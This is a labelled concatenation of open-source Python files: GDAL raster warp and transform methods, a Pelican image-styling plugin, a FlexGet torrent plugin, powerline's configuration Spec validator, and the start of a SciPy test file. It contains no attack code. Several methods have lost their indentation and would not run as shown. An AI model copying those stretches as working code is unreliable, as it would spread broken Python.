yval = self.origin.y + self.scale.y * self.height
# Calculate min and max values
xmin = min(xval, self.origin.x)
xmax = max(xval, self.origin.x)
ymin = min(yval, self.origin.y)
ymax = max(yval, self.origin.y)
return xmin, ymin, xmax, ymax
    @property
    def bands(self):
        # Sequence-like accessor over this raster's bands; a fresh wrapper
        # is returned on every access.
        return BandList(self)
def warp(self, ds_input, resampling='NearestNeighbour', max_error=0.0):
"""
Returns a warped GDALRaster with the given input characteristics.
The input is expected to be a dictionary containing the parameters
of the target raster. Allowed values are width, height, SRID, origin,
scale, skew, datatype, driver, and name (filename).
By default, the warp functions keeps all parameters equal to the values
of the original source raster. For the name of the target raster, the
name of the source raster will be used and appended with
_copy. + source_driver_name.
In addition, the resampling algorithm can be specified with the "resampling"
input parameter. The default is NearestNeighbor. For a list of all options
consult the GDAL_RESAMPLE_ALGORITHMS constant.
"""
# Get the parameters defining the geotransform, srid, and size of the raster
if 'width' not in ds_input:
ds_input['width'] = self.width
if 'height' not in ds_input:
ds_input['height'] = self.height
if 'srid' not in ds_input:
ds_input['srid'] = self.srs.srid
if 'origin' not in ds_input:
ds_input['origin'] = self.origin
if 'scale' not in ds_input:
ds_input['scale'] = self.scale
if 'skew' not in ds_input:
ds_input['skew'] = self.skew
# Get the driver, name, and datatype of the target raster
if 'driver' not in ds_input:
ds_input['driver'] = self.driver.name
if 'name' not in ds_input:
ds_input['name'] = self.name + '_copy.' + self.driver.name
if 'datatype' not in ds_input:
ds_input['datatype'] = self.bands[0].datatype()
# Set the number of bands
ds_input['nr_of_bands'] = len(self.bands)
# Create target raster
target = GDALRaster(ds_input, write=True)
# Copy nodata values to warped raster
for index, band in enumerate(self.bands):
target.bands[index].nodata_value = band.nodata_value
# Select resampling algorithm
algorithm = GDAL_RESAMPLE_ALGORITHMS[resampling]
# Reproject image
capi.reproject_image(
self._ptr, self.srs.wkt.encode(),
target._ptr, target.srs.wkt.encode(),
algorithm, 0.0, max_error,
c_void_p(), c_void_p(), c_void_p()
)
# Make sure all data is written to file
target._flush()
return target
def transform(self, srid, driver=None, name=None, resampling='NearestNeighbour',
max_error=0.0):
"""
Returns a copy of this raster reprojected into the given SRID.
"""
# Convert the resampling algorithm name into an algorithm id
algorithm = GDAL_RESAMPLE_ALGORITHMS[resampling]
# Instantiate target spatial reference system
target_srs = SpatialReference(srid)
# Create warped virtual dataset in the target reference system
target = capi.auto_create_warped_vrt(
self._ptr, self.srs.wkt.encode(), target_srs.wkt.encode(),
algorithm, max_error, c_void_p()
)
target = GDALRaster(target)
# Construct the target warp dictionary from the virtual raster
data = {
'srid': srid,
'width': target.width,
'height': target.height,
'origin': [target.origin.x, target.origin.y],
'scale': [target.scale.x, target.scale.y],
'skew': [target.skew.x, target.skew.y],
}
# Set the driver and filepath if provided
if driver:
data['driver'] = driver
if name:
data['name'] = name
# Warp the raster into new srid
return self.warp(data, resampling=resampling, max_error=max_error)
|
prisae/pelican-plugins
|
refs/heads/master
|
better_figures_and_images/better_figures_and_images.py
|
12
|
"""
Better Figures & Images
------------------------
This plugin:
- Adds a style="width: ???px; height: auto;" to each image in the content
- Also adds the width of the contained image to any parent div.figures.
- If RESPONSIVE_IMAGES == True, also adds style="max-width: 100%;"
- Corrects alt text: if alt == image filename, set alt = ''
TODO: Need to add a test.py for this plugin.
"""
from __future__ import unicode_literals
from os import path, access, R_OK
import os
from pelican import signals
from bs4 import BeautifulSoup
from PIL import Image
import pysvg.parser
import logging
logger = logging.getLogger(__name__)
def content_object_init(instance):
    """Post-process rendered content: fix up <img> and <object> tags.

    Adds an explicit pixel-width style to each image (and optionally
    'max-width: 100%' when RESPONSIVE_IMAGES is set), propagates the style
    to a parent div.figure, and blanks alt text that merely repeats the
    image path.
    """
    if instance._content is None:
        return
    content = instance._content
    soup = BeautifulSoup(content, 'html.parser')
    for img in soup(['img', 'object']):
        logger.debug('Better Fig. PATH: %s', instance.settings['PATH'])
        if img.name == 'img':
            logger.debug('Better Fig. img.src: %s', img['src'])
            img_path, img_filename = path.split(img['src'])
        else:
            logger.debug('Better Fig. img.data: %s', img['data'])
            img_path, img_filename = path.split(img['data'])
        logger.debug('Better Fig. img_path: %s', img_path)
        logger.debug('Better Fig. img_fname: %s', img_filename)
        # Strip off the known prefixes. Strip by len(prefix) rather than a
        # hard-coded slice: the old [10:] ate one extra character for
        # prefixes shorter than 10 characters.
        for prefix in ('(unknown)', '|filename|', '/static'):
            if img_path.startswith(prefix):
                img_path = img_path[len(prefix):]
                break
        else:
            if img_path.startswith('data:image'):
                # Image is encoded in-line (not a file).
                continue
            logger.warning('Better Fig. Error: img_path should start with either (unknown), |filename| or /static')
        # search src path list
        # 1. Build the source image filename from PATH
        # 2. Build the source image filename from STATIC_PATHS
        # if img_path start with '/', remove it.
        img_path = os.path.sep.join([el for el in img_path.split("/") if len(el) > 0])
        # style: (unknown)/static/foo/bar.png
        src = os.path.join(instance.settings['PATH'], img_path, img_filename)
        src_candidates = [src]
        # style: (unknown)../static/foo/bar.png
        src_candidates += [os.path.join(instance.settings['PATH'], static_path, img_path, img_filename) for static_path in instance.settings['STATIC_PATHS']]
        src_candidates = [f for f in src_candidates if path.isfile(f) and access(f, R_OK)]
        if not src_candidates:
            logger.error('Better Fig. Error: image not found: %s', src)
            logger.debug('Better Fig. Skip src: %s', img_path + '/' + img_filename)
            continue
        src = src_candidates[0]
        logger.debug('Better Fig. src: %s', src)
        # Open the source image and query dimensions; build style string.
        try:
            if img.name == 'img':
                im = Image.open(src)
                extra_style = 'width: {}px; height: auto;'.format(im.size[0])
            else:
                svg = pysvg.parser.parse(src)
                extra_style = 'width: {}px; height: auto;'.format(svg.get_width())
        except IOError:
            # Unreadable/corrupt image: fall back to a fluid width.
            logger.debug('Better Fig. Failed to open: %s', src)
            extra_style = 'width: 100%; height: auto;'
        if instance.settings.get('RESPONSIVE_IMAGES'):
            extra_style += ' max-width: 100%;'
        if img.get('style'):
            img['style'] += extra_style
        else:
            img['style'] = extra_style
        if img.name == 'img':
            # .get() avoids a KeyError when the tag has no alt attribute.
            if img.get('alt') == img['src']:
                img['alt'] = ''
        fig = img.find_parent('div', 'figure')
        if fig:
            if fig.get('style'):
                fig['style'] += extra_style
            else:
                fig['style'] = extra_style
    instance._content = soup.decode()
def register():
    """Pelican plugin entry point: hook into content initialization."""
    signals.content_object_init.connect(content_object_init)
|
v17al/Flexget
|
refs/heads/develop
|
flexget/plugins/modify/torrent.py
|
11
|
from __future__ import unicode_literals, division, absolute_import
import logging
import os
from flexget import plugin
from flexget.event import event
from flexget.utils.bittorrent import Torrent, is_torrent_file
log = logging.getLogger('modif_torrent')
class TorrentFilename(object):
    """
    Makes sure that entries containing torrent-file have .torrent
    extension. This is enabled always by default (builtins).
    """

    TORRENT_PRIO = 255

    @plugin.priority(TORRENT_PRIO)
    def on_task_modify(self, task, config):
        """Parse downloaded torrent files and fix the entry filename."""
        # Only scan through accepted entries, as the file must have been downloaded in order to parse anything
        for entry in task.accepted:
            # skip if entry does not have file assigned
            if 'file' not in entry:
                log.trace('%s doesn\'t have a file associated' % entry['title'])
                continue
            if not os.path.exists(entry['file']):
                entry.fail('File %s does not exist' % entry['file'])
                continue
            if os.path.getsize(entry['file']) == 0:
                entry.fail('File %s is 0 bytes in size' % entry['file'])
                continue
            if not is_torrent_file(entry['file']):
                continue
            log.debug('%s seems to be a torrent' % entry['title'])
            # create torrent object from torrent
            try:
                with open(entry['file'], 'rb') as f:
                    # NOTE: this reads entire file into memory, but we're pretty sure it's
                    # a small torrent file since it starts with TORRENT_RE
                    data = f.read()
                if 'content-length' in entry:
                    if len(data) != entry['content-length']:
                        entry.fail('Torrent file length doesn\'t match to the one reported by the server')
                        self.purge(entry)
                        continue
                # construct torrent object
                try:
                    torrent = Torrent(data)
                except SyntaxError as e:
                    # Format the exception itself instead of e.message:
                    # BaseException.message does not exist on Python 3.
                    entry.fail('%s - broken or invalid torrent file received' % e)
                    self.purge(entry)
                    continue
                entry['torrent'] = torrent
                entry['torrent_info_hash'] = torrent.info_hash
                # if we do not have good filename (by download plugin)
                # for this entry, try to generate one from torrent content
                if entry.get('filename'):
                    if not entry['filename'].lower().endswith('.torrent'):
                        # filename present but without .torrent extension, add it
                        entry['filename'] += '.torrent'
                else:
                    # generate filename from torrent or fall back to title plus extension
                    entry['filename'] = self.make_filename(torrent, entry)
            except Exception as e:
                # Boundary handler: never let one broken entry abort the task.
                log.exception(e)

    @plugin.priority(TORRENT_PRIO)
    def on_task_output(self, task, config):
        """Write back torrent files whose in-memory data was modified."""
        for entry in task.entries:
            if 'torrent' in entry:
                if entry['torrent'].modified:
                    # re-write data into a file
                    log.debug('Writing modified torrent file for %s' % entry['title'])
                    with open(entry['file'], 'wb+') as f:
                        f.write(entry['torrent'].encode())

    def make_filename(self, torrent, entry):
        """Build a filename for this torrent"""
        title = entry['title']
        files = torrent.get_filelist()
        if len(files) == 1:
            # single file, if filename is longer than title use it
            fn = files[0]['name']
            if len(fn) > len(title):
                title = fn[:fn.rfind('.')]
        # neatify title
        title = title.replace('/', '_')
        title = title.replace(' ', '_')
        title = title.replace('\u200b', '')
        # TODO: replace only zero width spaces, leave unicode alone?
        fn = '%s.torrent' % title
        log.debug('make_filename made %s' % fn)
        return fn

    def purge(self, entry):
        """Remove the temporary file attached to the entry, if any."""
        if os.path.exists(entry['file']):
            log.debug('removing temp file %s from %s' % (entry['file'], entry['title']))
            os.remove(entry['file'])
        del entry['file']
@event('plugin.register')
def register_plugin():
    # Registered as a builtin so torrent filename handling runs on every task.
    plugin.register(TorrentFilename, 'torrent', builtin=True, api_ver=2)
|
s0undt3ch/powerline
|
refs/heads/develop
|
powerline/lint/spec.py
|
14
|
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import itertools
import re
from copy import copy
from powerline.lib.unicode import unicode
from powerline.lint.markedjson.error import echoerr, DelayedEchoErr, NON_PRINTABLE_STR
from powerline.lint.selfcheck import havemarks
# Pattern matching non-printable characters. TAB, LF and NEL (U+0085) are
# removed from the pattern source before compiling, so they are allowed in
# configuration strings. NOTE(review): assumes NON_PRINTABLE_STR is a
# character-class style pattern source — confirm in markedjson.error.
NON_PRINTABLE_RE = re.compile(
    NON_PRINTABLE_STR.translate({
        ord('\t'): None,
        ord('\n'): None,
        0x0085: None,
    })
)
class Spec(object):
    '''Class that describes some JSON value

    In powerline it is only used to describe JSON values stored in powerline
    configuration.

    :param dict keys:
        Dictionary that maps keys that may be present in the given JSON
        dictionary to their descriptions. If this parameter is not empty it
        implies that described value has dictionary type. Non-dictionary types
        must be described using ``Spec()``: without arguments.

    .. note::
        Methods that create the specifications return ``self``, so calls to them
        may be chained: ``Spec().type(unicode).re('^\w+$')``. This does not
        apply to functions that *apply* specification like :py:meth`Spec.match`.

    .. note::
        Methods starting with ``check_`` return two values: first determines
        whether caller should proceed on running other checks, second
        determines whether there were any problems (i.e. whether error was
        reported). One should not call these methods directly: there is
        :py:meth:`Spec.match` method for checking values.

    .. note::
        In ``check_`` and ``match`` methods specifications are identified by
        their indexes for the purpose of simplifying :py:meth:`Spec.copy`
        method.

    Some common parameters:

    ``data``:
        Whatever data supplied by the first caller for checker functions. Is not
        processed by :py:class:`Spec` methods in any fashion.
    ``context``:
        :py:class:`powerline.lint.context.Context` instance, describes context
        of the value. :py:class:`Spec` methods only use its ``.key`` methods for
        error messages.
    ``echoerr``:
        Callable that should be used to echo errors. Is supposed to take four
        optional keyword arguments: ``problem``, ``problem_mark``, ``context``,
        ``context_mark``.
    ``value``:
        Checked value.
    '''

    def __init__(self, **keys):
        # Flat list of all child Spec objects; referenced by index everywhere.
        self.specs = []
        # Maps statically known dictionary keys to indexes in self.specs.
        self.keys = {}
        # (method_name, *args) tuples executed by match_checks().
        self.checks = []
        # Context message format string, see context_message().
        self.cmsg = ''
        self.isoptional = False
        # Specs for keys not known statically, see unknown_spec().
        self.uspecs = []
        # Produces the error message for keys no spec matched.
        self.ufailmsg = lambda key: 'found unknown key: {0}'.format(key)
        # Guard so update() registers the dict type check only once.
        self.did_type = False
        self.update(**keys)
    def update(self, **keys):
        '''Describe additional keys that may be present in given JSON value

        If called with some keyword arguments implies that described value is
        a dictionary. If called without keyword parameters it is no-op.

        :return: self.
        '''
        for k, v in keys.items():
            # Store the child spec and remember its index under the key name.
            self.keys[k] = len(self.specs)
            self.specs.append(v)
        if self.keys and not self.did_type:
            # First key registered: the described value must be a dict.
            self.type(dict)
            self.did_type = True
        return self
def copy(self, copied=None):
'''Deep copy the spec
:param dict copied:
Internal dictionary used for storing already copied values. This
parameter should not be used.
:return: New :py:class:`Spec` object that is a deep copy of ``self``.
'''
copied = copied or {}
try:
return copied[id(self)]
except KeyError:
instance = self.__class__()
copied[id(self)] = instance
return self.__class__()._update(self.__dict__, copied)
    def _update(self, d, copied):
        '''Helper for the :py:meth:`Spec.copy` function

        Populates new instance with values taken from the old one.

        :param dict d:
            ``__dict__`` of the old instance.
        :param dict copied:
            Storage for already copied values.
        '''
        # Start with reference copies of everything, then replace the mutable
        # containers with shallow copies and deep-copy the child specs.
        self.__dict__.update(d)
        self.keys = copy(self.keys)
        self.checks = copy(self.checks)
        self.uspecs = copy(self.uspecs)
        self.specs = [spec.copy(copied) for spec in self.specs]
        return self
    def unknown_spec(self, keyfunc, spec):
        '''Define specification for non-static keys

        This method should be used if key names cannot be determined at runtime
        or if a number of keys share identical spec (in order to not repeat it).
        :py:meth:`Spec.match` method processes dictionary in the given order:

        * First it tries to use specifications provided at the initialization or
          by the :py:meth:`Spec.update` method.
        * If no specification for given key was provided it processes
          specifications from ``keyfunc`` argument in order they were supplied.
          Once some key matches specification supplied second ``spec`` argument
          is used to determine correctness of the value.

        :param Spec keyfunc:
            :py:class:`Spec` instance or a regular function that returns two
            values (the same :py:meth:`Spec.match` returns). This argument is
            used to match keys that were not provided at initialization or via
            :py:meth:`Spec.update`.
        :param Spec spec:
            :py:class:`Spec` instance that will be used to check keys matched by
            ``keyfunc``.

        :return: self.
        '''
        if isinstance(keyfunc, Spec):
            # Spec keyfuncs are stored by index, like all child specs.
            self.specs.append(keyfunc)
            keyfunc = len(self.specs) - 1
        self.specs.append(spec)
        self.uspecs.append((keyfunc, len(self.specs) - 1))
        return self

    def unknown_msg(self, msgfunc):
        '''Define message which will be used when unknown key was found

        “Unknown” is a key that was not provided at the initialization and via
        :py:meth:`Spec.update` and did not match any ``keyfunc`` provided via
        :py:meth:`Spec.unknown_spec`.

        :param msgfunc:
            Function that takes that unknown key as an argument and returns the
            message text. Text will appear at the top (start of the sentence).

        :return: self.
        '''
        self.ufailmsg = msgfunc
        return self

    def context_message(self, msg):
        '''Define message that describes context

        :param str msg:
            Message that describes context. Is written using the
            :py:meth:`str.format` syntax and is expected to display keyword
            parameter ``key``.

        :return: self.
        '''
        self.cmsg = msg
        # Propagate recursively, but never overwrite a message a child spec
        # already has.
        for spec in self.specs:
            if not spec.cmsg:
                spec.context_message(msg)
        return self
    def check_type(self, value, context_mark, data, context, echoerr, types):
        '''Check that given value matches given type(s)

        :param tuple types:
            List of accepted types. Since :py:class:`Spec` is supposed to
            describe JSON values only ``dict``, ``list``, ``unicode``, ``bool``,
            ``float`` and ``NoneType`` types make any sense.

        :return: proceed, hadproblem.
        '''
        havemarks(value)
        # Exact type comparison (not isinstance), so e.g. a subclass does not
        # pass for its base type.
        if type(value.value) not in types:
            echoerr(
                context=self.cmsg.format(key=context.key),
                context_mark=context_mark,
                problem='{0!r} must be a {1} instance, not {2}'.format(
                    value,
                    ', '.join((t.__name__ for t in types)),
                    type(value.value).__name__
                ),
                problem_mark=value.mark
            )
            return False, True
        return True, False

    def check_func(self, value, context_mark, data, context, echoerr, func, msg_func):
        '''Check value using given function

        :param function func:
            Callable that should accept four positional parameters:

            #. checked value,
            #. ``data`` parameter with arbitrary data (supplied by top-level
               caller),
            #. current context and
            #. function used for echoing errors.

            This callable should return three values:

            #. determines whether ``check_func`` caller should proceed
               calling other checks,
            #. determines whether ``check_func`` should echo error on its own
               (it should be set to False if ``func`` echoes error itself) and
            #. determines whether function has found some errors in the checked
               value.

        :param function msg_func:
            Callable that takes checked value as the only positional parameter
            and returns a string that describes the problem. Only useful for
            small checker functions since it is ignored when second returned
            value is false.

        :return: proceed, hadproblem.
        '''
        havemarks(value)
        proceed, echo, hadproblem = func(value, data, context, echoerr)
        # Only echo here when the checker asked us to and actually failed.
        if echo and hadproblem:
            echoerr(context=self.cmsg.format(key=context.key),
                    context_mark=context_mark,
                    problem=msg_func(value),
                    problem_mark=value.mark)
        return proceed, hadproblem
def check_list(self, value, context_mark, data, context, echoerr, item_func, msg_func):
'''Check that each value in the list matches given specification
:param function item_func:
Callable like ``func`` from :py:meth:`Spec.check_func`. Unlike
``func`` this callable is called for each value in the list and may
be a :py:class:`Spec` object index.
:param func msg_func:
Callable like ``msg_func`` from :py:meth:`Spec.check_func`. Should
accept one problematic item and is not used for :py:class:`Spec`
object indicies in ``item_func`` method.
:return: proceed, hadproblem.
'''
havemarks(value)
i = 0
hadproblem = False
for item in value:
havemarks(item)
if isinstance(item_func, int):
spec = self.specs[item_func]
proceed, fhadproblem = spec.match(
item,
value.mark,
data,
context.enter_item('list item ' + unicode(i), item),
echoerr
)
else:
proceed, echo, fhadproblem = item_func(item, data, context, echoerr)
if echo and fhadproblem:
echoerr(context=self.cmsg.format(key=context.key + '/list item ' + unicode(i)),
context_mark=value.mark,
problem=msg_func(item),
problem_mark=item.mark)
if fhadproblem:
hadproblem = True
if not proceed:
return proceed, hadproblem
i += 1
return True, hadproblem
    def check_either(self, value, context_mark, data, context, echoerr, start, end):
        '''Check that given value matches one of the given specifications

        :param int start:
            First specification index.
        :param int end:
            Specification index that is greater by 1 than the last specification
            index.

        This method does not give an error if any specification from
        ``self.specs[start:end]`` is matched by the given value.
        '''
        havemarks(value)
        # Buffer error messages: they are only echoed (echo_all) when every
        # variant fails.
        new_echoerr = DelayedEchoErr(
            echoerr,
            'One of the either variants failed. Messages from the first variant:',
            'messages from the next variant:'
        )
        hadproblem = False
        for spec in self.specs[start:end]:
            proceed, hadproblem = spec.match(value, value.mark, data, context, new_echoerr)
            new_echoerr.next_variant()
            # A variant that matched cleanly (proceed and no problem) wins.
            if not proceed:
                break
            if not hadproblem:
                return True, False
        new_echoerr.echo_all()
        return False, hadproblem
def check_tuple(self, value, context_mark, data, context, echoerr, start, end):
'''Check that given value is a list with items matching specifications
:param int start:
First specification index.
:param int end:
Specification index that is greater by 1 then last specification
index.
This method checks that each item in the value list matches
specification with index ``start + item_number``.
'''
havemarks(value)
hadproblem = False
for (i, item, spec) in zip(itertools.count(), value, self.specs[start:end]):
proceed, ihadproblem = spec.match(
item,
value.mark,
data,
context.enter_item('tuple item ' + unicode(i), item),
echoerr
)
if ihadproblem:
hadproblem = True
if not proceed:
return False, hadproblem
return True, hadproblem
    def check_printable(self, value, context_mark, data, context, echoerr, _):
        '''Check that given unicode string contains only printable characters
        '''
        hadproblem = False
        # Report every offending character, not just the first one.
        for match in NON_PRINTABLE_RE.finditer(value):
            hadproblem = True
            echoerr(
                context=self.cmsg.format(key=context.key),
                context_mark=value.mark,
                problem='found not printable character U+{0:04x} in a configuration string'.format(
                    ord(match.group(0))),
                problem_mark=value.mark.advance_string(match.start() + 1)
            )
        return True, hadproblem

    def printable(self, *args):
        # Describe a unicode string without non-printable characters.
        self.type(unicode)
        self.checks.append(('check_printable', args))
        return self
    def type(self, *args):
        '''Describe value that has one of the types given in arguments

        :param args:
            List of accepted types. Since :py:class:`Spec` is supposed to
            describe JSON values only ``dict``, ``list``, ``unicode``, ``bool``,
            ``float`` and ``NoneType`` types make any sense.

        :return: self.
        '''
        self.checks.append(('check_type', args))
        return self

    # Comparison operators used by len() and cmp(), keyed by mnemonic.
    cmp_funcs = {
        'le': lambda x, y: x <= y,
        'lt': lambda x, y: x < y,
        'ge': lambda x, y: x >= y,
        'gt': lambda x, y: x > y,
        'eq': lambda x, y: x == y,
    }

    # Human-readable counterparts of cmp_funcs used in error messages.
    cmp_msgs = {
        'le': 'lesser or equal to',
        'lt': 'lesser then',
        'ge': 'greater or equal to',
        'gt': 'greater then',
        'eq': 'equal to',
    }
    # NOTE: shadows the builtin name ``len`` only in the class namespace;
    # inside the method the builtin is still resolved normally.
    def len(self, comparison, cint, msg_func=None):
        '''Describe value that has given length

        :param str comparison:
            Type of the comparison. Valid values: ``le``, ``lt``, ``ge``,
            ``gt``, ``eq``.
        :param int cint:
            Integer with which length is compared.
        :param function msg_func:
            Function that should accept checked value and return message that
            describes the problem with this value. Default value will emit
            something like “length of ['foo', 'bar'] is not greater then 10”.

        :return: self.
        '''
        cmp_func = self.cmp_funcs[comparison]
        msg_func = (
            msg_func
            or (lambda value: 'length of {0!r} is not {1} {2}'.format(
                value, self.cmp_msgs[comparison], cint))
        )
        self.checks.append((
            'check_func',
            (lambda value, *args: (True, True, not cmp_func(len(value), cint))),
            msg_func
        ))
        return self
    def cmp(self, comparison, cint, msg_func=None):
        '''Describe value that is a number or string that has given property

        :param str comparison:
            Type of the comparison. Valid values: ``le``, ``lt``, ``ge``,
            ``gt``, ``eq``. This argument will restrict the number or string to
            emit True on the given comparison.
        :param cint:
            Number or string with which value is compared. Type of this
            parameter affects required type of the checked value: ``str`` and
            ``unicode`` types imply ``unicode`` values, ``float`` type implies
            that value can be either ``int`` or ``float``, ``int`` type implies
            ``int`` value and for any other type the behavior is undefined.

        :param function msg_func:
            Function that should accept checked value and return message that
            describes the problem with this value. Default value will emit
            something like “10 is not greater then 10”.

        :return: self.
        '''
        # The type of cint dictates the type check registered for the value.
        if type(cint) is str:
            self.type(unicode)
        elif type(cint) is float:
            self.type(int, float)
        else:
            self.type(type(cint))
        cmp_func = self.cmp_funcs[comparison]
        msg_func = msg_func or (lambda value: '{0} is not {1} {2}'.format(value, self.cmp_msgs[comparison], cint))
        self.checks.append((
            'check_func',
            (lambda value, *args: (True, True, not cmp_func(value.value, cint))),
            msg_func
        ))
        return self
def unsigned(self, msg_func=None):
'''Describe unsigned integer value
:param function msg_func:
Function that should accept checked value and return message that
describes the problem with this value.
:return: self.
'''
self.type(int)
self.checks.append((
'check_func',
(lambda value, *args: (True, True, value < 0)),
(lambda value: '{0} must be greater then zero'.format(value))
))
return self
    # NOTE: shadows the builtin name ``list`` only in the class namespace.
    def list(self, item_func, msg_func=None):
        '''Describe list with any number of elements, each matching given spec

        :param item_func:
            :py:class:`Spec` instance or a callable. Check out
            :py:meth:`Spec.check_list` documentation for more details. Note that
            in :py:meth:`Spec.check_list` description :py:class:`Spec` instance
            is replaced with its index in ``self.specs``.
        :param function msg_func:
            Function that should accept checked value and return message that
            describes the problem with this value. Default value will emit just
            “failed check”, which is rather indescriptive.

        :return: self.
        '''
        self.type(list)
        if isinstance(item_func, Spec):
            # Child specs are stored and later referenced by index.
            self.specs.append(item_func)
            item_func = len(self.specs) - 1
        self.checks.append(('check_list', item_func, msg_func or (lambda item: 'failed check')))
        return self
    # NOTE: shadows the builtin name ``tuple`` only in the class namespace.
    def tuple(self, *specs):
        '''Describe list with the given number of elements, each matching corresponding spec

        :param (Spec,) specs:
            List of specifications. Last element(s) in this list may be
            optional. Each element in this list describes element with the same
            index in the checked value. Check out :py:meth:`Spec.check_tuple`
            for more details, but note that there list of specifications is
            replaced with start and end indices in ``self.specs``.

        :return: self.
        '''
        self.type(list)
        max_len = len(specs)
        min_len = max_len
        # Trailing optional specs lower the minimum accepted length.
        for spec in reversed(specs):
            if spec.isoptional:
                min_len -= 1
            else:
                break
        if max_len == min_len:
            self.len('eq', len(specs))
        else:
            self.len('ge', min_len)
            self.len('le', max_len)
        # Child specs are stored contiguously; check_tuple gets the range.
        start = len(self.specs)
        for i, spec in zip(itertools.count(), specs):
            self.specs.append(spec)
        self.checks.append(('check_tuple', start, len(self.specs)))
        return self
    def func(self, func, msg_func=None):
        '''Describe value that is checked by the given function

        Check out :py:meth:`Spec.check_func` documentation for more details.
        '''
        self.checks.append(('check_func', func, msg_func or (lambda value: 'failed check')))
        return self
    # NOTE: shadows the module name ``re`` only in the class namespace; the
    # module is still reachable inside the method body.
    def re(self, regex, msg_func=None):
        '''Describe value that is a string that matches given regular expression

        :param str regex:
            Regular expression that should be matched by the value.
        :param function msg_func:
            Function that should accept checked value and return message that
            describes the problem with this value. Default value will emit
            something like “String "xyz" does not match "[a-f]+"”.

        :return: self.
        '''
        self.type(unicode)
        # Compile once at spec-definition time, not per checked value.
        compiled = re.compile(regex)
        msg_func = msg_func or (lambda value: 'String "{0}" does not match "{1}"'.format(value, regex))
        self.checks.append((
            'check_func',
            (lambda value, *args: (True, True, not compiled.match(value.value))),
            msg_func
        ))
        return self
def ident(self, msg_func=None):
'''Describe value that is an identifier like ``foo:bar`` or ``foo``
:param function msg_func:
Function that should accept checked value and return message that
describes the problem with this value. Default value will emit
something like “String "xyz" is not an … identifier”.
:return: self.
'''
msg_func = (
msg_func
or (lambda value: 'String "{0}" is not an alphanumeric/underscore colon-separated identifier'.format(value))
)
return self.re('^\w+(?::\w+)?$', msg_func)
    def oneof(self, collection, msg_func=None):
        '''Describe value that is equal to one of the value in the collection

        :param set collection:
            A collection of possible values.
        :param function msg_func:
            Function that should accept checked value and return message that
            describes the problem with this value. Default value will emit
            something like “"xyz" must be one of {'abc', 'def', 'ghi'}”.

        :return: self.
        '''
        msg_func = msg_func or (lambda value: '"{0}" must be one of {1!r}'.format(value, list(collection)))
        # The closure keeps a reference to collection: later mutations of the
        # caller's collection affect the check.
        self.checks.append((
            'check_func',
            (lambda value, *args: (True, True, value not in collection)),
            msg_func
        ))
        return self
    def error(self, msg):
        '''Describe value that must not be there

        Useful for giving more descriptive errors for some specific keys then
        just “found unknown key: shutdown_event” or for forbidding certain
        values when :py:meth:`Spec.unknown_spec` was used.

        :param str msg:
            Message given for the offending value. It is formatted using
            :py:meth:`str.format` with the only positional parameter which is
            the value itself.

        :return: self.
        '''
        # Unconditional failure: the mere presence of the value is an error.
        self.checks.append((
            'check_func',
            (lambda *args: (True, True, True)),
            (lambda value: msg.format(value))
        ))
        return self
    def either(self, *specs):
        '''Describes value that matches one of the given specs

        Check out :py:meth:`Spec.check_either` method documentation for more
        details, but note that there a list of specs was replaced by start and
        end indices in ``self.specs``.

        :return: self.
        '''
        # Child specs are stored contiguously; check_either gets the range.
        start = len(self.specs)
        self.specs.extend(specs)
        self.checks.append(('check_either', start, len(self.specs)))
        return self
    def optional(self):
        '''Mark value as optional

        Only useful for key specs in :py:meth:`Spec.__init__` and
        :py:meth:`Spec.update` and some last supplied to :py:meth:`Spec.tuple`.

        :return: self.
        '''
        self.isoptional = True
        return self

    def required(self):
        '''Mark value as required

        Only useful for key specs in :py:meth:`Spec.__init__` and
        :py:meth:`Spec.update` and some last supplied to :py:meth:`Spec.tuple`.

        .. note::
            Value is required by default. This method is only useful for
            altering existing specification (or rather its copy).

        :return: self.
        '''
        self.isoptional = False
        return self
    def match_checks(self, *args):
        '''Process checks registered for the given value

        Processes only “top-level” checks: key specifications given using at the
        initialization or via :py:meth:`Spec.unknown_spec` are processed by
        :py:meth:`Spec.match`.

        :return: proceed, hadproblem.
        '''
        hadproblem = False
        for check in self.checks:
            # check[0] names a check_* method; the rest are its extra args.
            proceed, chadproblem = getattr(self, check[0])(*(args + check[1:]))
            if chadproblem:
                hadproblem = True
            if not proceed:
                return False, hadproblem
        return True, hadproblem
    def match(self, value, context_mark=None, data=None, context=(), echoerr=echoerr):
        '''Check that given value matches this specification

        :return: proceed, hadproblem.
        '''
        havemarks(value)
        # Top-level checks first; key specs are only consulted if they pass.
        proceed, hadproblem = self.match_checks(value, context_mark, data, context, echoerr)
        if proceed:
            if self.keys or self.uspecs:
                # Statically known keys: check present ones, report missing
                # non-optional ones.
                for key, vali in self.keys.items():
                    valspec = self.specs[vali]
                    if key in value:
                        proceed, mhadproblem = valspec.match(
                            value[key],
                            value.mark,
                            data,
                            context.enter_key(value, key),
                            echoerr
                        )
                        if mhadproblem:
                            hadproblem = True
                        if not proceed:
                            return False, hadproblem
                    else:
                        if not valspec.isoptional:
                            hadproblem = True
                            echoerr(context=self.cmsg.format(key=context.key),
                                    context_mark=None,
                                    problem='required key is missing: {0}'.format(key),
                                    problem_mark=value.mark)
                # Remaining keys: try the unknown-key specs in order.
                for key in value.keys():
                    havemarks(key)
                    if key not in self.keys:
                        for keyfunc, vali in self.uspecs:
                            valspec = self.specs[vali]
                            if isinstance(keyfunc, int):
                                # Integer keyfunc is an index into self.specs.
                                spec = self.specs[keyfunc]
                                proceed, khadproblem = spec.match(key, context_mark, data, context, echoerr)
                            else:
                                proceed, khadproblem = keyfunc(key, data, context, echoerr)
                            if khadproblem:
                                hadproblem = True
                            if proceed:
                                # First matching keyfunc wins; check the value.
                                proceed, vhadproblem = valspec.match(
                                    value[key],
                                    value.mark,
                                    data,
                                    context.enter_key(value, key),
                                    echoerr
                                )
                                if vhadproblem:
                                    hadproblem = True
                                break
                        else:
                            # No keyfunc matched: the key is unknown.
                            hadproblem = True
                            if self.ufailmsg:
                                echoerr(context=self.cmsg.format(key=context.key),
                                        context_mark=None,
                                        problem=self.ufailmsg(key),
                                        problem_mark=key.mark)
        return True, hadproblem
def __getitem__(self, key):
	'''Get specification for the given key
	'''
	spec_index = self.keys[key]
	return self.specs[spec_index]
def __setitem__(self, key, value):
	'''Set specification for the given key
	'''
	kwargs = {key: value}
	self.update(**kwargs)
|
gertingold/scipy
|
refs/heads/master
|
scipy/linalg/tests/test_blas.py
|
23
|
#
# Created by: Pearu Peterson, April 2002
#
from __future__ import division, print_function, absolute_import
__usage__ = """
Build linalg:
python setup.py build
